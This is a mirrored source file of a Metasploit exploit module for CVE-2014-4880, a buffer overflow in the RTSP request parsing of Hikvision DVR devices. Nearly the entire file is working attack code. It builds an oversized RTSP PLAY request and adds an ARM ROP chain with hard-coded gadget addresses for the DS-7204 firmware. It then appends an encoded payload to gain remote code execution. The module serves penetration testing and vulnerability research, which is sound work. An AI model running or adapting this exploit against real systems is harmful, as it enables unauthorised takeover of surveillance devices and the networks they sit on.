CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/misc/hikvision_rtsp_bof.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Hikvision DVR RTSP Request Remote Code Execution',

14
      'Description'    => %q{

15
        This module exploits a buffer overflow in the RTSP request parsing

16
        code of Hikvision DVR appliances. The Hikvision DVR devices record

17
        video feeds of surveillance cameras and offer remote administration

18
        and playback of recorded footage.

19


20
        The vulnerability is present in several models / firmware versions

21
        but due to the available test device this module only supports

22
        the DS-7204 model.

23
      },

24
      'Author'         =>

25
        [

26
          'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev

27
        ],

28
      'License'        => MSF_LICENSE,

29
      'References'     =>

30
        [

31
          [ 'CVE', '2014-4880' ],

32
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]

33
        ],

34
      'Platform'       => 'linux',

35
      'Arch'           => ARCH_ARMLE,

36
      'Privileged'     => true,

37
      'Targets'        =>

38
        [

39
          #

40
          # ROP targets are difficult to represent in the hash, use callbacks instead

41
          #

42
          [ "DS-7204 Firmware V2.2.10 build 131009", {

43


44
            # The callback handles all target-specific settings

45
            :callback => :target_ds7204_1,

46
              'g_adjustesp' => 0x002c828c,

47
              # ADD             SP, SP, #0x350

48
              # LDMFD           SP!, {R4-R6,PC}

49


50
              'g_r3fromsp'  => 0x00446f80,

51
              # ADD             R3, SP, #0x60+var_58

52
              # BLX             R6

53


54
              'g_blxr3_pop' => 0x00456360,

55
              # BLX             R3

56
              # LDMFD           SP!, {R1-R7,PC}

57


58
              'g_popr3'     => 0x0000fe98,

59
              # LDMFD           SP!, {R3,PC}

60
          } ],

61


62
          [ "Debug Target", {

63


64
            # The callback handles all target-specific settings

65
            :callback => :target_debug

66


67
          } ]

68


69
        ],

70
      'DefaultTarget'  => 0,

71
      'DisclosureDate' => '2014-11-19'))

72


73
    register_options(

74
      [

75
        Opt::RPORT(554)

76
      ])

77
  end

78


79
  def exploit

80
    unless self.respond_to?(target[:callback], true)

81
      fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")

82
    end

83


84
    device_rop = self.send(target[:callback])

85


86
    request =  "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"

87
    request << "CSeq: 7\r\n"

88
    request << "Authorization: Basic "

89
    request << rand_text_alpha(0x280 + 34)

90
    request << [target["g_adjustesp"]].pack("V")[0..2]

91
    request << "\r\n\r\n"

92
    request << rand_text_alpha(19)

93


94
    # now append the ropchain

95
    request << device_rop

96
    request << rand_text_alpha(8)

97
    request << payload.encoded

98


99
    connect

100
    sock.put(request)

101
    disconnect

102
  end

103


104
  # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc

105
  def target_ds7204_1

106
    # Create a fixed-size buffer for the rop chain

107
    ropbuf = rand_text_alpha(24)

108


109
    # CHAIN = [

110
    #   0, #R4 pop adjustsp

111
    #   0, #R5 pop adjustsp

112
    #   GADGET_BLXR3_POP, #R6 pop adjustsp

113
    #   GADGET_POPR3,

114
    #   0, #R3 pop

115
    #   GADGET_R3FROMSP,

116
    # ]

117


118
    ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")

119
    ropbuf[12,4] = [target["g_popr3"]].pack("V")

120
    ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")

121


122
    return ropbuf

123
  end

124


125
  # Generate a buffer that provides a starting point for exploit development

126
  def target_debug

127
    Rex::Text.pattern_create(2000)

128
  end

129


130
  def rhost

131
    datastore['RHOST']

132
  end

133


134
  def rport

135
    datastore['RPORT']

136
  end

137
end

138


139